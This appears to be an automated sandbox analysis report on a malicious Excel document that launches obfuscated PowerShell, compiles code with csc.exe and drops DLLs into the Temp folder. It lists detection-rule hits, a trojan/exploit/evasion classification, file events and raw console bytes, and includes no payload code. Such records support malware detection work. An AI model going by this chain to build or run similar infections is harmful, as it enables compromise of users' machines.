Source: 00000004.00000002.1673377572.01260000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000000.1635094604.00010000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000002.1774225767.002D0000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1650835635.00360000.00000002.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000000.1705388458.00010000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1679114701.04400000.00000008.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1672890417.00060000.00000008.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000E.00000002.1736973475.00370000.00000002.sdmp, type: MEMORY; Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000003.1713665934.00010000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1673047466.00190000.00000004.sdmp, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1774008438.000D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1673224653.01080000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1777041758.01AE0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1774035610.000D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1781520586.04430000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1781679900.04480000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1673691174.01640000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1774465519.004C0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000002.1674343739.019B0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1776428355.01790000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000D.00000002.1736577833.00330000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1780569437.03F60000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1780905680.03FA0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\3ndkwphw.dll, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\h2oah0u7.dll, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Users\user\AppData\Local\Temp\ua6j8io5.dll, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4370000.6.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1880000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.4430000.5.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.60000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1080000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4480000.6.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.45c0000.6.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4430000.5.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.260000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.csc.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4400000.7.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4430000.5.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.csc.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4c0000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4370000.6.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.4430000.5.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.19b0000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 13.2.csc.exe.330000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.470000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1880000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1080000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.4400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3f60000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.3fa0000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.45c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.260000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3ea0000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4480000.6.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.1ae0000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 13.2.csc.exe.330000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 14.2.csc.exe.370000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.csc.exe.360000.0.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.1790000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1bb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.1ae0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3ea0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.3f60000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.19b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.3fa0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1640000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 9.2.powershell.exe.4c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.powershell.exe.1790000.2.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1640000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 4.2.powershell.exe.1bb0000.5.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Classification label
Source: classification engine | Classification label: mal88.troj.expl.evad.winXLS@25/38@6/3
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Excel
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVR6A81.tmp
Document contains an OLE Workbook stream indicating a Microsoft Excel file
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls | OLE indicator, Workbook stream: true
Found command line output
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..N......3Un,...#........3Un....@.m.L|Tn.......l$(Zn...l..e.L|Tn.............7Unp.....Tn@.m.H.&.......N.....$(Zn..Tn....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......#.....&.....A.Xwt...............a.Xw..0.................7W..................#.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..N.....4......./...H.&.....A.Xw4...............a.Xw..0................._W................../.........N.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t......./.....&.....A.Xwt...............a.Xw..0.................zW................../.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........4.......;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7..................W..................;...........$.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......;.....&.....A.Xwt...............a.Xw..0..................W..................;.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..N.....4.......G...H.&.....A.Xw4...............a.Xw..0..................W..................G.........N.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......G.....&.....A.Xwt...............a.Xw..0..................X..................G.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..N.....4.......S...H.&.....A.Xw4...............a.Xw..0.................(X..................S.........N.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......S.....&.....A.Xwt...............a.Xw..0.................CX..................S.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..N.....4......._...H.&.....A.Xw4...............a.Xw..0.................kX.................._.........N.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t......._.....&.....A.Xwt...............a.Xw..0..................X.................._.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..N.....4.......k...H.&.....A.Xw4...............a.Xw..0..................X..................k.........N.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......k.....&.....A.Xwt...............a.Xw..0..................X..................k.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..N.....4.......w...H.&.....A.Xw4...............a.Xw..0..................X..................w.........N.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......w.....&.....A.Xwt...............a.Xw..0..................Y..................w.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..N.....4...........H.&.....A.Xw4...............a.Xw..0.................4Y............................N.f.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.............&.....A.Xwt...............a.Xw..0.................OY..........................T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........4........... .&.....A.Xw4...............a.Xw..0.................wY....................................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.............&.....A.Xwt...............a.Xw..0..................Y..........................T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..H......3`k,...#........3`k....@.<.L|_k.......l$(ek...l.$A.L|_k.............7`kp....._k@.<.X.2.......H.....$(ek.._k....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......#.....2.....A.Xwt...............a.Xw..0.....................................#.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..H.....4......./...X.2.....A.Xw4...............a.Xw..0...................................../.........H.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t......./.....2.....A.Xwt...............a.Xw..0...................................../.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........4.......;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7.....................................;...........$.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......;.....2.....A.Xwt...............a.Xw..0................. ...................;.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..H.....4.......G...X.2.....A.Xw4...............a.Xw..0.................H...................G.........H.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......G.....2.....A.Xwt...............a.Xw..0.................c...................G.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..H.....4.......S...X.2.....A.Xw4...............a.Xw..0.....................................S.........H.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......S.....2.....A.Xwt...............a.Xw..0.....................................S.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..H.....4......._...X.2.....A.Xw4...............a.Xw..0....................................._.........H.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t......._.....2.....A.Xwt...............a.Xw..0....................................._.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..H.....4.......k...X.2.....A.Xw4...............a.Xw..0.....................................k.........H.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......k.....2.....A.Xwt...............a.Xw..0.................,...................k.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..H.....4.......w...X.2.....A.Xw4...............a.Xw..0.................T...................w.........H.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.......w.....2.....A.Xwt...............a.Xw..0.....................................w.......T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..H.....4...........X.2.....A.Xw4...............a.Xw..0...............................................H.f.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.............2.....A.Xwt...............a.Xw..0.............................................T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........4........... .2.....A.Xw4...............a.Xw..0.................;.....................................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........t.............2.....A.Xwt...............a.Xw..0.................V...........................T.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..V......3`k....#........3`k....@.\.L|_k.......l$(ek...l..V.L|_kd............7`k......_k@.\.X>A.......V.....$(ek.._k....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l...#.....A.x...A.Xw................a.Xw..0.....D...............................#.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..V.........l.../...X>A.8...A.Xw................a.Xw..0.....D.............................../.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l.../.....A.x...A.Xw................a.Xw..0.....D.............................../.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l...;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.7.....D...............................;.......t...$.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l...;.....A.x...A.Xw................a.Xw..0.....D...............................;.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..V.........l...G...X>A.8...A.Xw................a.Xw..0.....D...............................G.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l...G.....A.x...A.Xw................a.Xw..0.....D...........$...................G.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..V.........l...S...X>A.8...A.Xw................a.Xw..0.....D...........L...................S.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l...S.....A.x...A.Xw................a.Xw..0.....D...........g...................S.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..V.........l..._...X>A.8...A.Xw................a.Xw..0.....D..............................._.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l..._.....A.x...A.Xw................a.Xw..0.....D..............................._.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..V.........l...k...X>A.8...A.Xw................a.Xw..0.....D...........s...................k.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l...k.....A.x...A.Xw................a.Xw..0.....D...............................k.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..V.........l...w...X>A.8...A.Xw................a.Xw..0.....D...............................w.........V.......Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l...w.....A.x...A.Xw................a.Xw..0.....D...............................w.................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..V.........l.......X>A.8...A.Xw................a.Xw..0.....D.........................................V.f.....Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l.........A.x...A.Xw................a.Xw..0.....D.................................................Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l....... .A.8...A.Xw................a.Xw..0.....D...........<...........................t.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ............l.........A.x...A.Xw................a.Xw..0.....D...........W.....................................Ww........
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
